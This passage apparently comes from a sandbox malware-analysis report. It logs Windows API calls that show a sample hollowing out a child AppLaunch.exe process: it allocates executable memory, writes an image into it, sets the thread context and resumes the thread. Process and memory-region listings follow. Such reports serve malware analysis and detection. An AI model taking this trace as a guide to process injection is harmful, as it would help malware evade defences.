[35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0141.377] ReadProcessMemory (in: hProcess=0xac, lpBaseAddress=0xfffde008, lpBuffer=0xb3b18, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xb3b18*, lpNumberOfBytesRead=0x0) returned 1 [0141.377] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x35c0000 [0141.379] VirtualAllocEx (hProcess=0xac, lpAddress=0x400000, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0141.381] WriteProcessMemory (in: hProcess=0xac, lpBaseAddress=0x400000, lpBuffer=0x35c0000*, nSize=0x20000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x35c0000*, lpNumberOfBytesWritten=0x0) returned 1 [0141.388] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0xb3ab4 | out: lpflOldProtect=0xb3ab4*=0x40) returned 1 [0141.517] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x402000, dwSize=0x18db8, flNewProtect=0x20, lpflOldProtect=0xb3ab4 | out: lpflOldProtect=0xb3ab4*=0x40) returned 1 [0141.519] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x41c000, dwSize=0x4d4, flNewProtect=0x2, lpflOldProtect=0xb3ab4 | out: lpflOldProtect=0xb3ab4*=0x40) returned 1 [0141.519] VirtualProtectEx (in: hProcess=0xac, lpAddress=0x41e000, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0xb3ab4 | out: lpflOldProtect=0xb3ab4*=0x40) returned 1 [0141.519] VirtualFree (lpAddress=0x35c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.524] WriteProcessMemory (in: hProcess=0xac, lpBaseAddress=0xfffde008, lpBuffer=0xb3b48*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xb3b48*, lpNumberOfBytesWritten=0x0) returned 1 [0141.525] SetThreadContext (hThread=0xa8, lpContext=0xb3728*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0xfffde000, Edx=0x0, Ecx=0x0, Eax=0x4191e2, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x36ffb8, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0141.527] ResumeThread (hThread=0xa8) returned 0x1 [0141.797] CloseHandle (hObject=0xac) returned 1 [0141.797] CloseHandle (hObject=0xa8) returned 1 [0142.152] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0142.180] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0142.379] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac38 | out: hHeap=0x250000) returned 1 [0142.379] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cc50 | out: hHeap=0x250000) returned 1 [0142.379] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cc60 | out: hHeap=0x250000) returned 1 [0142.379] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26bca0 | out: hHeap=0x250000) returned 1 [0142.379] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e010 | out: hHeap=0x250000) returned 1 [0142.380] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abf8 | out: hHeap=0x250000) returned 1 [0142.380] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ac08 | out: hHeap=0x250000) returned 1 [0142.380] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdd0 | out: hHeap=0x250000) returned 1 [0142.380] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26bc80 | out: hHeap=0x250000) returned 1 [0142.380] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26abe8 | out: hHeap=0x250000) returned 1 [0142.410] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2662a8 | out: hHeap=0x250000) returned 1 [0142.410] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268140 | out: hHeap=0x250000) returned 1 [0142.410] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26a468 | out: hHeap=0x250000) returned 1 [0142.410] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264600 | out: hHeap=0x250000) returned 1 [0142.411] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266220 | out: hHeap=0x250000) returned 1 [0142.624] GetLastError () returned 0x578 [0142.624] SetLastError (dwErrCode=0x578) [0142.624] GetLastError () returned 0x578 [0142.624] SetLastError (dwErrCode=0x578) [0142.625] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cfd8 | out: hHeap=0x250000) returned 1 [0142.625] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26c448 | out: hHeap=0x250000) returned 1 [0142.652] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0142.653] GetLastError () returned 0x7e [0142.653] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fefc | out: phModule=0x18fefc) returned 0 [0142.653] ExitProcess (uExitCode=0x0) [0142.654] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e000 | out: hHeap=0x250000) returned 1 [0142.654] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e3e8 | out: hHeap=0x250000) returned 1 [0142.655] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2681d0 | out: hHeap=0x250000) returned 1 Process: id = "8" image_name = "applaunch.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe" page_root = "0xa91a000" os_pid = "0xec4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xeb4" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" cur_dir = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2320 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2321 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2322 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2323 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2324 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2325 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2326 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2327 start_va = 0xa60000 end_va = 0xa78fff monitored = 0 entry_point = 0xa6fb00 region_type = mapped_file name = "applaunch.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe") Region: id = 2328 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2329 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2330 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2331 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2332 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 2333 start_va = 0xfffdb000 end_va = 0xfffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffdb000" filename = "" Region: id = 2334 start_va = 0xfffde000 end_va = 0xfffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffde000" filename = "" Region: id = 2335 start_va = 0xfffdf000 end_va = 0xfffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffdf000" filename = "" Region: id = 2336 start_va = 0xfffe0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 2338 start_va = 0x400000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2340 start_va = 0x520000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2341 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2342 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2343 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2344 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2345 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2346 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2347 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 2348 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2349 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2350 start_va = 0x5a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2351 start_va = 0x753b0000 end_va = 0x753f9fff monitored = 1 